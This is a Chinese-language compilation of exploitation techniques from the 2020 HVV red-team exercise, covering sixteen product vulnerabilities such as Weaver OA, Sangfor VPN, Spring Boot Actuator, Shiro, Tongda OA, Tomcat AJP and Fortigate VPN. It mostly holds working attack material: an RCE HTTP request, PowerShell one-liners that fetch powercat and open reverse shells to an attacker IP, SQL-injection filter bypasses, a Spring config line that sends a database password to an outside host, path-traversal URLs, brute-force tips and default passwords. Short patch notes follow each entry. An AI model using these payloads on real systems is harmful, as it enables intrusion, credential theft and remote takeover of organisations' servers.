2020HVV护网漏洞利用总结
2020HVV护网漏洞利用总结
1、 泛微OA Bsh 远程代码执行漏洞
漏洞简介
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.
影响组件泛微OA
漏洞指纹
Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet
Fofa Dork
app=“泛微-协同办公OA”
漏洞分析
泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/215218.html
https://github.com/beanshell/beanshell
http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI
漏洞利用
Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=eval%00(“ex”%2b"ec(“whoami”)");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
利用技巧
1.其他形式绕过
eval%00(“ex”%2b"ec(“whoami”)"); 也可以换成 ex\u0065c(“cmd /c dir”);
2.泛微多数都是windows环境, 反弹shell可以使用pcat
Powershell
IEX(New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’);powercat -c ip -p 6666 -e cmd
防护方法
1.及时更新泛微补丁
2.拦截/weaver/bsh.servlet.BshServlet目录的访问
2、泛微OA e-cology SQL注入漏洞
漏洞简介
泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转
影响组件
泛微OA
漏洞指纹
Set-Cookie: ecology_JSessionId=
ecology
WorkflowCenterTreeData
/mobile/plugin/SyncUserInfo.jsp
Fofa Dork
app=“泛微-协同办公OA”
漏洞分析
泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区
https://xz.aliyun.com/t/6531
漏洞利用
泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客
https://blog.csdn.net/zycdn/article/details/102494037
Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle
https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py
应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园
https://www.cnblogs.com/AtesetEnginner/p/11558469.html
/mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述
利用技巧
1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了
2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了
3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测
4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格)
"-1) “+” "*800+ “union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=(‘sysadmin’”
老版本可以在关键字后面加 /**/ 来绕过sql检测
新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表
就Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) “+” “*800+ " or/**/ 1=1 and id<(5”,这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。
防护方法
1.及时更新泛微补丁
2.泛微最好不要开放到公网
3.使用waf拦击
3、深信服VPN远程代码执行
漏洞简介
深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过
影响组件深信服 VPN
漏洞指纹
Set-Cookie: TWFID=welcome to ssl vpn Sinfor
Fofa Dork
header=“Set-Cookie: TWFID=”
漏洞分析
深信服vpnweb登录逆向学习 – potatso – 博客园
https://www.cnblogs.com/potatsoSec/p/12326356.html
漏洞利用
wget -t %d -T %d --spider %s
利用技巧
1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网
2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来
3.去除空格也简单 cat /etc/passwd | tr " \n" “+|”
防护方法
1.及时更新补丁
2.升级到最新版
4、深信服 VPN 口令爆破
漏洞简介
深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行
影响组件深信服 VPN
漏洞指纹
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
Fofa Dork
app=“深信服-SSL-VPN”
漏洞分析
关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
此处存疑, 时间问题没有测试
漏洞利用
1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多)
#encoding=utf8
import requests
import hashlib
import urllib3
urllib3.disable_warnings()
import re
session = requests.session()
def SanForLogin(target, password, username=“admin”):
# 加密密码的算法是 sha1(password+sid)
# 没有公开POC就不写了
1
2
3
SanForLogin(“https://xxxxxxxxxxx/”, “admin”)
利用技巧
1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多
国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid)
爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123
2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能
3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell
https://www.uedbox.com/post/31092/
防护方法
1.及时更新补丁
2.升级到最新版
5、边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞
漏洞简介
大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主
影响组件
防火墙, 网关, 路由器, VPN
漏洞指纹
防火墙, 网关, 路由器, VPN
Fofa Dork防火墙, 网关, 路由器, VPN 的名称
漏洞分析
【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html
渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA
漏洞利用
【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html
渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA
利用技巧
1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令
admin root 123456 永远的神
内网的安全平台就是个漏洞指南
防护方法
1.设置强口令
2.限制来源IP
6、Thinkphp 相关漏洞
漏洞简介
Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题
影响组件
Thinkphp
漏洞指纹
Thinkphp X-Powered-By: ThinkPHP
Fofa Dork
app=“ThinkPHP”
漏洞分析
ThinkPHP漏洞总结 – 赛克社区
http://zone.secevery.com/article/1165
挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心
https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/
ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客
https://blog.csdn.net/Fly_hps/article/details/81201904
DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461
漏洞利用
SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写
https://github.com/Dido1960/thinkphp
whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具
https://github.com/whirlwind110/tphack
利用技巧
1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露
2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中
3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞
DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461
防护方法
1.及时更新补丁
2.升级到最新版Thinkphp
3.前置WAF进行防护
7、Spring 系列漏洞
漏洞简介
Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒
影响组件
Spring xxx
漏洞指纹
X-Application-Context:
Fofa Dork
app=“Spring-Framework”
漏洞分析
Spring 框架漏洞集合 ~ Misaki’s Blog
https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/
Exploiting Spring Boot Actuators | Veracode blog
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog
https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
漏洞利用
mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE
https://github.com/mpgn/Spring-Boot-Actuator-Exploit
artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
https://github.com/artsploit/yaml-payload
利用技巧
1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下
/trace
/health
/loggers
/metrics
/autoconfig
/heapdump
/threaddump
/env
/info
/dump
/configprops
/mappings
/auditevents
/beans
/jolokia
/cloudfoundryapplication
/hystrix.stream
/actuator
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
/monitor
/monitor/auditevents
/monitor/beans
/monitor/health
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/info
/monitor/loggers
/monitor/heapdump
/monitor/threaddump
/monitor/metrics
/monitor/scheduledtasks
/monitor/httptrace
/monitor/mappings
/monitor/jolokia
/monitor/hystrix.stream
这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。
2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok
eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了
防护方法
1.及时更新补丁
2.开启Spring Boot Actuators权限校验
3.前置WAF进行防护
8、Solr 系列漏洞
漏洞简介
Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞,
影响组件
Solr
漏洞指纹
Solr
Fofa Dork
app=“Solr”
漏洞分析
Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/218730.html
Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
https://paper.seebug.org/1009/
漏洞利用
veracode-research/solr-injection: Apache Solr Injection Research
https://github.com/veracode-research/solr-injection
jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)
https://github.com/jas502n/CVE-2019-12409
mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit
https://github.com/mogwailabs/mjet
利用技巧
1.看到锤就完事了, 漏洞太多了, 一片一片的
2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作
防护方法
1.升级到最新版
2.不要对外开放敏感端口
9、 Ghostscript 上传图片代码执行
漏洞简介
Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招
影响组件
imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用
漏洞指纹
.ps/.jpg/.png
Fofa Dork
漏洞分析
ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台
https://www.anquanke.com/post/id/157513
漏洞利用
Exploit Database Search
https://www.exploit-db.com/search?q=Ghostscript
vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub
https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116
利用技巧
1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping uname.admin.ceye.io 或 ping whoami.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping whoami.centos.admin.ceye.io / ping whoami.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的
防护方法
1.升级到最新版
Apache Shiro RememberMe 反序列化导致的命令执行漏洞 (Shiro-550, CVE-2016-4437)
漏洞简介
Apache Shiro 是企业常见的Java安全框架, 其漏洞在2019年攻防演练中起到显著作用
影响组件
Apache Shiro (由于密钥泄露的问题, 部分高于1.2.4版本的Shiro也会受到影响)
漏洞指纹
set-Cookie:rememberMe=deleteMe或者URL中有shiro字样有一些时候服务器不会主动返回 rememberMe=deleteMe, 直接发包即可
Fofa Dork
app=“Apache-Shiro”
漏洞分析
漏洞分析:Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞
https://paper.seebug.org/shiro-rememberme-1-2-4/
漏洞利用
wyzxxz/shiro_rce:shiro rce反序列命令执行一键工具
https://github.com/wyzxxz/shiro_rce
Apache Shiro回显poc改造计划
https://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bw
利用技巧
1.使用多个泄露的key进行遍历, 这个在实战中确实有效
关于Shiro反序列化漏洞的延伸—升级shiro也能被shell
https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw
Shiro 100 Key
https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA
2.使用URLDNS进行检测提速
使用适应性最强的URLDNS(这个不受JDK版本和安全策略影响, 除非网络限制不能出DNS)进行检测且可以使用ysoserial提前生成序列化内容java-jartarget/ysoserial-0.0.5-SNAPSHOT-all.jarURLDNS “http://1234567890.test.ceye.io” > urldns.ser然后使用占位符+目标url hash的方法修改序列化内容中的urldns地址提高检测速度以及后续检测无需使用ysoserial
例如1234567890.test.ceye.io可以换成md5(‘www.qq.com’).hexdigest() [:10].test.ceye.io也就是9d2c68d82d.test.ceye.io可以预先记录hash9d2c68d82d www.qq.com然后进行hash查表就可以知道是DNSLOG来自哪个目标,性能会提高不少
3.已知目标使用了Shiro,可以采取Shiro-721的报错逻辑来进行遍历key这样即使DNS不能出网,也可以通过是否返回rememberMe=deleteMe来断定shiro key的正确性, 前提是服务器有rememberMe=deleteMe相关回显
防护方法
1.升级Shiro到最新版
2.升级对应JDK版本到 8u191/7u201/6u211/11.0.1 以上
3.WAF拦截Cookie中长度过大的rememberMe值
10、通达OA 远程代码执行漏洞
漏洞简介
通达OA 在国内的用户也比较多, 虽说代码加了密, 奈何是Zend5.4, 解码很简单, 然后代码中的漏洞就很清楚, 尤其是变量覆盖和注入
影响组件
通达OA
漏洞指纹
“/images/tongda.ico”>
Office Anywhere 20xx版网络智能办公系统
/ispirit/interface/gateway.php
Fofa Dork
app=“通达OA”
漏洞分析
note/readme.md at c28f7b232ad5f0ff7ccc672bbedcd34e9e3cca86 leezp/note
https://github.com/leezp/note/blob/c28f7b232ad5f0ff7ccc672bbedcd34e9e3cca86/20200313%E9%80%9A%E8%BE%BEOA/readme.md
代码审计 | 通达OA 任意用户登录漏洞(匿名RCE)分析 | zrools
https://www.zrools.org/2020/04/23/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E9%80%9A%E8%BE%BEOA-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%8C%BF%E5%90%8DRCE%EF%BC%89%E5%88%86%E6%9E%90/
漏洞利用
NS-Sp4ce/TongDaOA-Fake-User: 通达OA 任意用户登录漏洞
https://github.com/NS-Sp4ce/TongDaOA-Fake-User
tools/tongda_v11.4_rce_exp.py at master · zrools/tools 管理员伪造后sql写shell
https://github.com/zrools/tools/blob/master/python/tongda_v11.4_rce_exp.py
利用技巧
1.这个漏洞也很简单, 发预警的当天就分析出来了,一个上传,一个包含, 主要是文件包含漏洞的/ispirit/interface/gateway.php文件在v11才有绕过disable_function也很简单, 直接调用COM(‘WScript.shell’)组件就ok了
2.文件名结构规则如下
256@2003_ 2055499620|123. php.
对应文件名为
attach/im/2003/2055499620.123.php
因为是windows的,1.php.可以绕过黑名单,写到文件就成了1.php
3.2020年4月20号爆出任意用户伪造登录, 这里小伙伴测试 2017 和 v11 的 poc 好像可以用
通达OA前台任意用户伪造登录漏洞
https://vas.riskivy.com/vuln-detail?id=33
NS-Sp4ce/TongDaOA-Fake-User: 通达OA 任意用户登录漏洞
https://github.com/NS-Sp4ce/TongDaOA-Fake-User
防护方法
1.及时更新补丁
2.使用waf拦截
11、 致远OA 帆软报表 seeyonreport 远程代码执行
漏洞简介
帆软报表 (seeyonreport) 很多时候会跟合致远OA一起出现, 通常用户还不知道, 所以这里有几个漏洞点
影响组件
帆软报表 seeyonreport
漏洞指纹
https://seeyoon.com/seeyonreport/ReportServer?op=fs_load&cmd=fs_signin&_=1560911828892
seeyonreport
Fofa Dork
app=“用友-致远OA”
漏洞分析
帆软报表v8.0 Getshell漏洞分析 | ADog’s Blog
http://foreversong.cn/archives/1378
漏洞利用
帆软报表v8.0 Getshell漏洞分析 | ADog’s Blog
http://foreversong.cn/archives/1378
xray/finereport-directory-traversal.yml at master chaitin/xray
https://github.com/chaitin/xray/blob/master/pocs/finereport-directory-traversal.yml
利用技巧
1.未设置密码或者读取读取管理员密码
https://seeyoon.com/seeyonreport/ReportServer?op=fs_load&cmd=fs_signin&_=1560911828892
这里很有可能是没有设置密码的, 修改密码进入后台就可以了
如果设置里密码, 尝试这个接口
/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml,读取管理员密码, 然后使用上文的解密程序解密
2.后台getshell
这种后台能装插件的都随便getshell,先去下载一个指定版本的jar包,本地测试环境是9.0,下载com.fr.plugin.external-1.3.4.zip
https://shop.finereport.com/plugin/2d36b210-2a59-4940-8c4f-f3f16d58cd66
http://shopps.finereport.com/com.fr.plugin.external-1.3.4.zip?e=1561433162&token=GYG9vMioxqbEgx-5HoAMAelD0zGdUrXT4UZ3w-d1:N-PeIkhKkjCY7LHdqelnSvp_LmA=编译一个恶意的LocaleFinder.class打包进去,复制LocaleFinder.class到
\com.fr.plugin.external-1.3.4.zip\fr-plugin-external-1.3.4\fr-plugin-external-1.3.4.jar\com\fr\plugin\external\locale\进入到插件管理界面,上传符合规范的jar包插件即可没生效就访问一下https://xxxx/seeyonreport/ReportServer?op=im一般后台都是win,可以直接使用powershell进行反弹shellpowershell
IEX(New-Object System.Net.Webclient).
DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’);
powercat -c vps_ip -p 6666 -e cmd
防护方法
1.及时更新补丁
2.使用waf拦截
12、 SaltStack认证绕过复现
1、漏洞概述
在 CVE-2020-11651认证绕过漏洞中攻击者通过构造恶意请求,可以绕过 Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞:
ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,可以用来直接在master publish服务器上对消息进行排队。这些消息可以用来触发minion来以root权限运行任意命令。
ClearFuncs类还会暴露prep_auth_info()方法,该方法会返回用来认证master服务器上本地root用户的命令的root key。然后root key就可以远程调用master 服务器的管理命令。这种无意的暴露提供给远程非认证的攻击者对salt master的与root权限等价的访问权限。
2、影响版本
l SaltStack < 2019.2.4
l SaltStack < 3000.2
3、环境搭建
直接使用vulhub进行搭建
git clone https://github.com/vulhub/vulhub.git
cd /vulhub/saltstack/CVE-2020-11651/
docker-compose up -d
查看环境是否启动docker ps
4、漏洞复现
Poc:
https://github.com/jasperla/CVE-2020-11651-poc
执行前需要安装salt库,需指定salt库版本
pip3 install salt==2019.2.3
读取文件:
python3 exploit.py --master 192.168.232.170 -r /etc/passwd
5、修复方式
1、SaltStack官方已发布最新版本修复此漏洞,建议相关用户及时更新至安全版本及其以上,并开启SaltStack自动更新,以便实时获取补丁或升级至安全版本:https://repo.saltstack.com/
2、禁止将Salt Master默认监听端口(4505、4506)向公网开放,并设置为仅对可信对象开放。
13、Windows DNS Server蠕虫级远程代码执行漏洞
1、漏洞详情
Windows DNS Server 是 Windows Server 服务器上一项重要功能组件。负责域内主机的所有DNS相关服务的调度和处理。远程攻击者可不经过身份验证,向受影响的服务器发送特制的请求包,最终触发该漏洞,成功利用此漏洞的攻击者可在受影响的系统上执行任意代码。进而控制其他相连通的服务造成严重危害。
2、影响版本
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core inastallation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server version 1909 (Server Core installation)
Windows Server version 1903 (Server Core installation)
Windows Server version 2004 (Server Core installation)
3、利用场景
(1)受害者访问攻击者域名"evil.server.io"
(2)本地DNS服务器或域内的DNS服务器无法解析"evil.server.io",向google DNS服务器(如8.8.8.8)查询
(3)查到后,发现该域名可以由攻击者DNS服务器解析,所以将该信息缓存到域服务器上
(4)第二次查询时,直接和攻击者DNS服务器进行查询
(5)此时攻击者服务器就可以构造响应包触发漏洞
EXP:CVE-2020-1350 (SIGRed) - Windows DNS DoS Exploit
https://github.com/maxpl0it/CVE-2020-1350-DoS
4、修复建议
微软提供了临时的缓解措施:
修改注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters值:TcpReceivePacketSize 数据类型 DWORD = 0xFF00
注意:必须重新启动 DNS 服务才能生效。
有关更多信息,请参阅 KB4569509:DNS 服务器漏洞 CVE-2020-1350 指南:
https://support.microsoft.com/zh-cn/help/4569509/windows-dns-server-remote-code-execution-vulnerability
若要移除此临时解决方法:
应用修补程序后,管理员可以移除值 TcpReceivePacketSize 及其数据,以使注册表项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters 下的所有其他内容与之前保持相同。
手动升级方案:
通过如下链接自行寻找符合操作系统版本的漏洞补丁,并进行补丁下载安装。
CVE-2020-1350 | Windows DNS 服务器远程执行代码漏洞
https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-1350
14、Tomcat 本地文件包含漏洞 (CVE-2020-1938)
漏洞简介
Tomcat 是常见的Web 容器, 用户量非常巨大, Tomcat 8009 ajp端口一直是默认开放的, 这个漏洞存在很多年了, 这次应该有奇效
影响组件
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
Fofa Dork
protocol=“ajp”
漏洞分析
Apache Tomcat AJP协议文件包含漏洞分析–斗象能力中心
https://blog.riskivy.com/apache-tomcat-ajp%e5%8d%8f%e8%ae%ae%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/
5、漏洞利用
0nise/CVE-2020-1938: CVE-2020-1938
https://github.com/0nise/CVE-2020-1938
利用技巧
1.当时还没公开poc的时候就分析出来exp挺有意思的, 效果确实还可以, 当天fofa都被累挂了
主要代码也就这t = Tomcat(“127.0.0.1”, 8009)
_, data = t.perform_request(’/’,
attributes=[{‘name’: ‘req_attribute’,
‘value’: [‘javax.servlet.include.request_uri’, ‘/’]
},
{‘name’: ‘req_attribute’,
‘value’: [‘javax.servlet.include.path_info’,
“/WEB-INF/web.xml”]
},
{‘name’: ‘req_attribute’,
‘value’: [‘javax.servlet.include.servlet_path’,
‘/’]
},
])
print(’----------------------------’)
print("".join([bytes.decode(d.data) for d in data]))
2.通过修改这里的路径可以进行Webapp切换, 默认是ROOT/, 需要切换应用就改成/admin/
3.通常检测的时候,尽量保持t.perform_request(’/’,有的poc喜欢用/addsd这种的不存在的路径, 有些情况会读不到文件
防护方法
1.升级到最新版
2.屏蔽8009端口对外开放
15、Fortigate SSL VPN 文件读取/远程代码执行
漏洞简介
Fortigate SSL VPN 在全球用户量巨大, 去年橘子哥发现了文件读取和远程代码执行漏洞
影响组件
Fortigate SSL VPN
漏洞指纹
Fortigate
4tinet2095866
Fofa Dork
“Fortigate” && port=10443
漏洞分析
Orange: Attacking SSL VPN – Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html?m=1
漏洞利用
密码读取
milo2012/CVE-2018-13379: CVE-2018-13379
https://github.com/milo2012/CVE-2018-13379
任意密码重置, 这肯定是个后门
milo2012/CVE-2018-13382: CVE-2018-13382
https://github.com/milo2012/CVE-2018-13382
利用技巧
1.文件读取的路径构造
https://xxxxxx:10443/remote/fgt_lang?lang=/…/…/…/…//dev/cmdb/sslvpn_websession
如下padding可以构造出来任意文件读取, 可以读取其他文件, 注意这个系统好像没有/etc/passwd print("/…/…/…/…/"+(raw_input().rjust(35, ‘/’)))
2.寻找魔术数字
虽然当时橘子哥没有公开魔术数字, 但是当时随手分析了一下下面这个启动文件, 搜索一下magic就找到 4tinet2095866,
https://xxxxxxxx:10443/remote/fgt_lang?lang=/…/…/…/…/bin/sslvpnd
后来发现这个字符串在js里面也有, 直接从前台分析也可以获得
https://xxxxx:10443/sslvpn/js/lgin.js?q=5f9a6877fd1f78da768239aae6e739c2
防护方法
1.及时更新补丁
2.升级到最新版
16 、齐治堡垒机相关漏洞
漏洞简介
齐治堡垒机是国内使用比较多的堡垒机产品, 后端使用PHP编写
影响组件
齐治堡垒机
漏洞指纹
shterm
Fofa Dork
app=“shterm-堡垒机”
漏洞分析
审计某系统从解密到GetShell–云+社区–腾讯云
https://cloud.tencent.com/developer/article/1448700
齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)分析–开发笔记
http://kfbiji.com/article/65b98114903248eb
漏洞利用
齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)分析–开发笔记
http://kfbiji.com/article/65b98114903248eb
利用技巧
1.齐治堡垒机默认口令:shterm/shterm
2.普通用户获取堡垒机权限, 登录之后可尝试命令注入
如果有类似chrome的应用可以直接使用ctrl+o打开窗口, 然后新建bat, 起一个cmd或者其他的程序
防护方法
1.及时更新补丁
2.升级到最新版
3.做好权限控制
-参考-
2020攻防演练弹药库
SaltStack认证绕过复现
CVE-2020-1350分析与复现
<< 上一篇
下一篇 >>